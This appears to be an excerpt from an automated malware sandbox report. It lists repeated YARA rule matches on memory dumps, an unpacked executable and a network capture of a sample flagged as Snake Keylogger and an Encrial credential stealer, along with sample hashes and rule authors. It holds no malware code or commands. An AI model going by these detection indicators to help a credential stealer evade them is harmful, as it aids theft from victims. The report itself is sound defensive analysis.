                Source: 00000000.00000002.737275091.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737205564.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737680246.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737438859.0000000002934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737240182.00000000028CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738349545.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738520206.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737615006.000000000297C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738206086.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737694580.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738046605.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737534636.0000000002954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738084741.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738331335.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737246038.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737258885.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737950672.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738536747.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737218317.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737983761.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737998771.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737291941.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737504124.0000000002948000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737901412.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737883433.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737944111.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738244012.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737409041.0000000002920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738141181.0000000002A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737889019.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737855627.00000000029FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737285680.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000000.429980691.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738079094.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738039601.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738059775.0000000002A79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738194827.0000000002AA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737190839.00000000028A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737592635.0000000002970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738181191.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737144637.000000000288C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737978655.0000000002A5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737655258.0000000002988000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.735961437.0000000000532000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737628909.0000000002980000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737833563.00000000029F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737414593.0000000002924000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737929824.0000000002A45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737560330.0000000002960000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737825477.00000000029F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738023885.0000000002A6D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738485397.0000000002AE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737575208.0000000002968000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737808101.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737431755.0000000002930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737466902.0000000002940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737280426.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737670833.000000000298C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737689328.0000000002994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737225304.00000000028C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737609149.0000000002978000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737936851.0000000002A49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737641884.0000000002984000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738147230.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738223259.0000000002AAD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738314614.0000000002AC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737450837.0000000002938000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737597795.0000000002974000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738125525.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738160524.0000000002A9D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738425558.0000000002AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738406461.0000000002AD5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738262050.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737864301.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737968200.0000000002A55000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737105124.0000000002867000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737263659.00000000028DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737253851.00000000028D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738109588.0000000002A89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737973247.0000000002A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737457876.000000000293C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737523761.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737154483.0000000002890000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737212904.00000000028BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737268236.00000000028DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737839802.00000000029F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738270244.0000000002AB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738131471.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737420491.0000000002928000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738395968.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.738017194.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737513462.000000000294C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.737567001.0000000002964000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000003.670353008.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.739661705.000000000671A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: 0OZQi3b0tM.exe PID: 7100, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0OZQi3b0tM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0OZQi3b0tM.exe, type: SAMPLEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: sslproxydump.pcap, type: PCAPMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.0.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.0OZQi3b0tM.exe.530000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738443207.0000000002ADD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737543287.0000000002958000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738278860.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737582921.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738464278.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737477229.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737233949.00000000028C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737426073.000000000292C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737400500.000000000291C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737877910.0000000002A31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737872155.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738102517.0000000002A85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737894796.0000000002A3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737177065.0000000002898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737163773.0000000002894000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738298999.0000000002AC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737551923.000000000295C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737275091.00000000028E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737205564.00000000028B7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737680246.0000000002990000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737438859.0000000002934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737240182.00000000028CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738349545.0000000002ACD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738520206.0000000002AE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737615006.000000000297C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738206086.0000000002AA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737694580.0000000002998000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738046605.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737534636.0000000002954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738084741.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738331335.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737246038.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737258885.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737950672.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.738536747.0000000002AED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737218317.00000000028BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737983761.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737998771.0000000002A65000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737291941.00000000028EF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737504124.0000000002948000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737901412.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737883433.0000000002A35000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.737944111.0000000002A4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
